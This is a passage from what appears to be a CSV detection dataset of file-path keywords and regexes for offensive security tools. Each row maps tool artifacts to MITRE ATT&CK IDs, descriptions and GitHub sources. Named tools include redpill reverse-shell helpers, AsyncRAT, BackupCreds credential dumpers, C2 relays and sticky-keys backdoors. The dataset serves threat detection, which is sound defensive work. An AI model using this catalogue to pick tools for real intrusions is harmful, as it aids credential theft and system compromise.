- T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation 
tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*\AppData\Local\Temp\factura.exe*",".{0,1000}\\AppData\\Local\\Temp\\factura\.exe.{0,1000}","offensive_tool_keyword","saint","(s)AINT is a Spyware Generator for Windows systems written in Java","T1056.001 - T1125 - T1123 - T1113 - T1105 - T1573.001","TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","C2","https://github.com/tiagorlampert/sAINT","1","0","N/A","10","10","679","306","2020-04-03T14:34:34Z","2017-11-18T18:43:25Z" "*\AppData\Local\Temp\GetLogs.ps1*",".{0,1000}\\AppData\\Local\\Temp\\GetLogs\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*\AppData\Local\Temp\KPortScan*",".{0,1000}\\AppData\\Local\\Temp\\KPortScan.{0,1000}","offensive_tool_keyword","KPortScan","port scanner used by attackers","T1046 - T1595","TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/stardust50578/rdp_brute","1","0","N/A","8","1","3","6","2019-05-19T14:25:06Z","2019-05-19T14:29:49Z" "*\AppData\Local\Temp\Leaked.txt*",".{0,1000}\\AppData\\Local\\Temp\\Leaked\.txt.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 
- T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*\AppData\Local\Temp\Payload.ps1*",".{0,1000}\\AppData\\Local\\Temp\\Payload\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","https://github.com/r00t-3xp10it/redpill","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*\AppData\Local\Temp\Screenshot.ps1*",".{0,1000}\\AppData\\Local\\Temp\\Screenshot\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" 
"*\AppData\Local\Temp\SSIDump.zip*",".{0,1000}\\AppData\\Local\\Temp\\SSIDump\.zip.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*\AppData\Local\Temp\Start-WebServer..ps1*",".{0,1000}\\AppData\\Local\\Temp\\Start\-WebServer\.\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*\AppData\Local\Temp\StartWebServer.ps1*",".{0,1000}\\AppData\\Local\\Temp\\StartWebServer\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - 
T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*\AppData\Local\Temp\tor --*",".{0,1000}\\AppData\\Local\\Temp\\tor\s\-\-.{0,1000}","offensive_tool_keyword","torproject","Browse Privately. Explore Freely. Defend yourself against tracking and surveillance. Circumvent censorship.","T1090 - T1134 - T1188 - T1307 - T1497 - T1560","TA0001 - TA0002 - TA0005 - TA0011","N/A","N/A","Data Exfiltration","torproject.org","1","0","N/A","9","10","N/A","N/A","N/A","N/A" "*\AppData\Local\Temp\Upload.ps1*",".{0,1000}\\AppData\\Local\\Temp\\Upload\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*\AppData\Local\Temp\webserver.ps1*",".{0,1000}\\AppData\\Local\\Temp\\webserver\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 
- TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*\args_spoofing-rs.exe*",".{0,1000}\\args_spoofing\-rs\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tools","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","10","8","715","68","2024-04-24T14:16:09Z","2023-11-29T16:07:06Z" "*\arsenal-1.1.0.zip*",".{0,1000}\\arsenal\-1\.1\.0\.zip.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tools","https://github.com/Orange-Cyberdefense/arsenal","1","0","commands cheat sheets","8","10","N/A","N/A","N/A","N/A" "*\arsenal-1.2.0.zip*",".{0,1000}\\arsenal\-1\.2\.0\.zip.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tools","https://github.com/Orange-Cyberdefense/arsenal","1","0","commands cheat sheets","8","10","N/A","N/A","N/A","N/A" "*\arsenal-1.2.1.zip*",".{0,1000}\\arsenal\-1\.2\.1\.zip.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tools","https://github.com/Orange-Cyberdefense/arsenal","1","0","commands cheat sheets","8","10","N/A","N/A","N/A","N/A" "*\arsenal-master.zip*",".{0,1000}\\arsenal\-master\.zip.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation 
tools","https://github.com/Orange-Cyberdefense/arsenal","1","0","commands cheat sheets","8","10","N/A","N/A","N/A","N/A" "*\Ask4Creds.ps1*",".{0,1000}\\Ask4Creds\.ps1.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","N/A","Lateral Movement","https://github.com/Leo4j/Amnesiac","1","0","N/A","10","3","265","46","2024-04-18T15:39:34Z","2023-10-31T15:06:25Z" "*\asm\x64\alter_pe_sections*",".{0,1000}\\asm\\x64\\alter_pe_sections.{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","0","N/A","10","10","460","71","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z" "*\asm\x86\alter_pe_sections*",".{0,1000}\\asm\\x86\\alter_pe_sections.{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","0","N/A","10","10","460","71","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z" "*\asm_CelestialSpark.x64.o*",".{0,1000}\\asm_CelestialSpark\.x64\.o.{0,1000}","offensive_tool_keyword","CelestialSpark","A modern 64-bit position independent meterpreter and Sliver compatible reverse_TCP Staging Shellcode based on Cracked5piders Stardust","T1572 - T1048 - T1041 - T1105","TA0005 - TA0011 - TA0010","N/A","N/A","C2","https://github.com/Karkas66/CelestialSpark","1","0","N/A","10","10","53","6","2024-04-11T13:10:32Z","2024-04-11T12:17:22Z" 
"*\AsmHell.asm*",".{0,1000}\\AsmHell\.asm.{0,1000}","offensive_tool_keyword","HellsHall","Performing Indirect Clean Syscalls","T1106","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Maldev-Academy/HellHall","1","0","N/A","8","5","413","61","2023-04-19T06:10:47Z","2023-01-03T04:43:05Z" "*\ASPJinjaObfuscator*",".{0,1000}\\ASPJinjaObfuscator.{0,1000}","offensive_tool_keyword","ASPJinjaObfuscator","Heavily obfuscated ASP web shell generation tool.","T1100 - T1027","TA0003 - TA0005?","N/A","N/A","Defense Evasion","https://github.com/fin3ss3g0d/ASPJinjaObfuscator","1","0","N/A","8","1","60","11","2024-04-26T01:27:42Z","2024-04-23T01:01:53Z" "*\asreproasting.c*",".{0,1000}\\asreproasting\.c.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF for Kerberos abuse (an implementation of some important features of the Rubeus)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/RalfHacker/Kerbeus-BOF","1","0","N/A","10","10","321","32","2023-11-20T17:30:34Z","2023-11-20T10:01:36Z" 
"*\AsyncRAT\*",".{0,1000}\\AsyncRAT\\.{0,1000}","offensive_tool_keyword","AsyncRAT-C-Sharp","Open-Source Remote Administration Tool For Windows C# (RAT)","T1021.002 - T1056.001 - T1113 - T1133 - T1041 - T1555 - T1129 - T1564.001","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/NYAN-x-CAT/AsyncRAT-C-Sharp","1","0","N/A","10","10","2110","708","2023-10-16T21:41:12Z","2019-01-19T04:02:26Z" "*\ataDmargorP\:C*",".{0,1000}\\ataDmargorP\\\:C.{0,1000}","offensive_tool_keyword","powershell","powershell obfuscations techniques observed by malwares - reversed strings","T1027 - T1059.001","TA0005 - TA0002","Qakbot","N/A","Defense Evasion","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*\Athena-*.zip*",".{0,1000}\\Athena\-.{0,1000}\.zip.{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","166","35","2024-04-25T14:30:04Z","2022-01-24T20:44:38Z" "*\AtomLdr\x64*",".{0,1000}\\AtomLdr\\x64.{0,1000}","offensive_tool_keyword","AtomLdr","A DLL loader with advanced evasive features","T1071.004 - T1574.001 - T1574.002 - T1071.001 - T1055.003 - T1059.003 - T1546.003 - T1574.003 - T1574.004 - T1059.001 - T1569.002","TA0011 - TA0006 - TA0002 - TA0008 - TA0007","N/A","N/A","Exploitation tools","https://github.com/NUL0x4C/AtomLdr","1","0","N/A","N/A","6","599","83","2023-02-26T19:57:09Z","2023-02-26T17:59:26Z" "*\AttackerMITM.py*",".{0,1000}\\AttackerMITM\.py.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - 
TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*\AtYourService.exe*",".{0,1000}\\AtYourService\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*\audio\exfiltrator.py*",".{0,1000}\\audio\\exfiltrator\.py.{0,1000}","offensive_tool_keyword","PyExfil","A Python Package for Data Exfiltration","T1041 - T1567 - T1027","TA0011 - TA0009 - TA0002","","","Data Exfiltration","https://github.com/ytisf/PyExfil","1","0","N/A","10","8","738","138","2023-02-17T03:12:36Z","2014-11-27T19:06:24Z" "*\autodiscover\brute.go*",".{0,1000}\\autodiscover\\brute\.go.{0,1000}","offensive_tool_keyword","ruler","A tool to abuse Exchange services","T1087 - T1110 - T1133 - T1064 - T1204","TA0007 - TA0006 - TA0003 - TA0002 - TA0005","N/A","N/A","Persistence","https://github.com/sensepost/ruler","1","0","N/A","N/A","10","2082","347","2024-03-18T00:51:32Z","2016-08-18T15:05:13Z" "*\AutoRecon-main*",".{0,1000}\\AutoRecon\-main.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - 
TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","8","10","4816","847","2024-01-23T06:15:45Z","2019-03-01T23:50:14Z" "*\AutoSmuggle\*.cs*",".{0,1000}\\AutoSmuggle\\.{0,1000}\.cs.{0,1000}","offensive_tool_keyword","AutoSmuggle","Utility to craft HTML or SVG smuggled files for Red Team engagements","T1027.006 - T1598","TA0005 - TA0043","N/A","N/A","Defense Evasion","https://github.com/surajpkhetani/AutoSmuggle","1","0","N/A","9","3","214","28","2024-03-19T09:26:49Z","2022-03-20T19:02:06Z" "*\autotimeline*",".{0,1000}\\autotimeline.{0,1000}","offensive_tool_keyword","autotimeliner","Automagically extract forensic timeline from volatile memory dumps.","T1547 - T1057 - T1003","TA0005 - TA0008","N/A","N/A","Forensic Exploitation tools","https://github.com/andreafortuna/autotimeliner","1","1","N/A","N/A","2","121","23","2023-03-17T07:29:34Z","2018-11-12T16:13:32Z" "*\avetdbg.txt*",".{0,1000}\\avetdbg\.txt.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. 
have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","10","10","1609","332","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z" "*\avira\getCredsavira.h*",".{0,1000}\\avira\\getCredsavira\.h.{0,1000}","offensive_tool_keyword","pandora","A red team tool that assists into extracting/dumping master credentials and/or entries from different password managers","T1555 - T1003","TA0006 - TA0003","N/A","N/A","Credential Access","https://github.com/efchatz/pandora","1","0","N/A","10","6","533","73","2024-04-30T18:44:57Z","2023-11-03T18:01:31Z" "*\avira\getCredsavira2.h*",".{0,1000}\\avira\\getCredsavira2\.h.{0,1000}","offensive_tool_keyword","pandora","A red team tool that assists into extracting/dumping master credentials and/or entries from different password managers","T1555 - T1003","TA0006 - TA0003","N/A","N/A","Credential Access","https://github.com/efchatz/pandora","1","0","N/A","10","6","533","73","2024-04-30T18:44:57Z","2023-11-03T18:01:31Z" "*\avred.py*",".{0,1000}\\avred\.py.{0,1000}","offensive_tool_keyword","avred","Avred is being used to identify which parts of a file are identified by a Antivirus and tries to show as much possible information and context about each match.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/dobin/avred","1","0","N/A","9","4","316","34","2023-09-30T12:28:42Z","2022-05-19T12:12:34Z" "*\avred.py*",".{0,1000}\\avred\.py.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. 
PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","11481","4570","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*\avredweb.py *",".{0,1000}\\avredweb\.py\s.{0,1000}","offensive_tool_keyword","avred","Avred is being used to identify which parts of a file are identified by a Antivirus and tries to show as much possible information and context about each match.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/dobin/avred","1","0","N/A","9","4","316","34","2023-09-30T12:28:42Z","2022-05-19T12:12:34Z" "*\AzureC2Proxy\*",".{0,1000}\\AzureC2Proxy\\.{0,1000}","offensive_tool_keyword","AzureC2Relay","AzureC2Relay is an Azure Function that validates and relays Cobalt Strike beacon traffic by verifying the incoming requests based on a Cobalt Strike Malleable C2 profile.","T1090 - T1090.003 - T1027 - T1027.005 - T1071 - T1071.001","TA0042 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/Flangvik/AzureC2Relay","1","0","N/A","10","10","204","46","2021-02-15T18:06:38Z","2021-02-14T00:03:52Z" "*\AzureC2Relay*",".{0,1000}\\AzureC2Relay.{0,1000}","offensive_tool_keyword","AzureC2Relay","AzureC2Relay is an Azure Function that validates and relays Cobalt Strike beacon traffic by verifying the incoming requests based on a Cobalt Strike Malleable C2 profile.","T1090 - T1090.003 - T1027 - T1027.005 - T1071 - T1071.001","TA0042 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/Flangvik/AzureC2Relay","1","1","N/A","10","10","204","46","2021-02-15T18:06:38Z","2021-02-14T00:03:52Z" "*\AzureHound.ps1*",".{0,1000}\\AzureHound\.ps1.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - 
?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*\BabelStrike.py*",".{0,1000}\\BabelStrike\.py.{0,1000}","offensive_tool_keyword","BabelStrike","The purpose of this tool is to normalize and generate possible usernames out of a full names list that may include names written in multiple (non-English) languages. common problem occurring from scraped employee names lists (e.g. from Linkedin)","T1078 - T1114","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/t3l3machus/BabelStrike","1","0","N/A","1","2","110","22","2023-12-16T13:51:54Z","2023-01-10T07:59:00Z" "*\BabyShark-master.zip*",".{0,1000}\\BabyShark\-master\.zip.{0,1000}","offensive_tool_keyword","BabyShark","This is a basic C2 generic server written in Python and Flask.","T1102.002 - T1071.001 - T1132.001 - T1027 - T1043 - T1573.002","TA0006 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/UnkL4b/BabyShark","1","1","N/A","10","10","174","28","2021-07-03T00:18:18Z","2020-06-02T12:27:20Z" "*\backdoor.bat*",".{0,1000}\\backdoor\.bat.{0,1000}","offensive_tool_keyword","logon_backdoor","automated sticky keys backdoor","T1174 - T1078 - T1546.013","TA0003","N/A","N/A","Persistence","https://github.com/szymon1118/logon_backdoor","1","0","N/A","6","1","10","4","2016-02-12T11:42:59Z","2016-02-10T22:38:46Z" "*\backdoor.exe*",".{0,1000}\\backdoor\.exe.{0,1000}","offensive_tool_keyword","logon_backdoor","automated sticky keys backdoor","T1174 - T1078 - T1546.013","TA0003","N/A","N/A","Persistence","https://github.com/szymon1118/logon_backdoor","1","0","N/A","6","1","10","4","2016-02-12T11:42:59Z","2016-02-10T22:38:46Z" "*\backdoor\backdoor.mk*",".{0,1000}\\backdoor\\backdoor\.mk.{0,1000}","offensive_tool_keyword","logon_backdoor","automated sticky keys backdoor","T1174 - T1078 - 
T1546.013","TA0003","N/A","N/A","Persistence","https://github.com/szymon1118/logon_backdoor","1","0","N/A","6","1","10","4","2016-02-12T11:42:59Z","2016-02-10T22:38:46Z" "*\backdoor\backdoor.project*",".{0,1000}\\backdoor\\backdoor\.project.{0,1000}","offensive_tool_keyword","logon_backdoor","automated sticky keys backdoor","T1174 - T1078 - T1546.013","TA0003","N/A","N/A","Persistence","https://github.com/szymon1118/logon_backdoor","1","0","N/A","6","1","10","4","2016-02-12T11:42:59Z","2016-02-10T22:38:46Z" "*\backdoor_new.bat*",".{0,1000}\\backdoor_new\.bat.{0,1000}","offensive_tool_keyword","logon_backdoor","automated sticky keys backdoor","T1174 - T1078 - T1546.013","TA0003","N/A","N/A","Persistence","https://github.com/szymon1118/logon_backdoor","1","0","N/A","6","1","10","4","2016-02-12T11:42:59Z","2016-02-10T22:38:46Z" "*\backdoored\*",".{0,1000}\\backdoored\\.{0,1000}","offensive_tool_keyword","the-backdoor-factory","Patch PE ELF Mach-O binaries with shellcode new version in development*","T1055.002 - T1055.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/secretsquirrel/the-backdoor-factory","1","0","N/A","10","10","3252","785","2023-10-30T14:13:32Z","2013-05-30T01:04:24Z" "*\BackupCreds.csproj*",".{0,1000}\\BackupCreds\.csproj.{0,1000}","offensive_tool_keyword","BackupCreds","A C# implementation of dumping credentials from Windows Credential Manager","T1003 - T1555","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/leftp/BackupCreds","1","0","N/A","9","1","51","6","2023-09-23T10:37:05Z","2023-09-23T06:42:20Z" "*\backupcreds.exe*",".{0,1000}\\backupcreds\.exe.{0,1000}","offensive_tool_keyword","BackupCreds","A C# implementation of dumping credentials from Windows Credential Manager","T1003 - T1555","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/leftp/BackupCreds","1","0","N/A","9","1","51","6","2023-09-23T10:37:05Z","2023-09-23T06:42:20Z" 
"*\backupcreds.sln*",".{0,1000}\\backupcreds\.sln.{0,1000}","offensive_tool_keyword","BackupCreds","A C# implementation of dumping credentials from Windows Credential Manager","T1003 - T1555","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/leftp/BackupCreds","1","0","N/A","9","1","51","6","2023-09-23T10:37:05Z","2023-09-23T06:42:20Z" "*\backupcreds\Program.cs*",".{0,1000}\\backupcreds\\Program\.cs.{0,1000}","offensive_tool_keyword","BackupCreds","A C# implementation of dumping credentials from Windows Credential Manager","T1003 - T1555","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/leftp/BackupCreds","1","0","N/A","9","1","51","6","2023-09-23T10:37:05Z","2023-09-23T06:42:20Z" "*\BackupCreds-main*",".{0,1000}\\BackupCreds\-main.{0,1000}","offensive_tool_keyword","BackupCreds","A C# implementation of dumping credentials from Windows Credential Manager","T1003 - T1555","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/leftp/BackupCreds","1","0","N/A","9","1","51","6","2023-09-23T10:37:05Z","2023-09-23T06:42:20Z" "*\BackupOperatorToDA*",".{0,1000}\\BackupOperatorToDA.{0,1000}","offensive_tool_keyword","BackupOperatorToDA","From an account member of the group Backup Operators to Domain Admin without RDP or WinRM on the Domain Controller","T1078 - T1078.003 - T1021 - T1021.006 - T1112 - 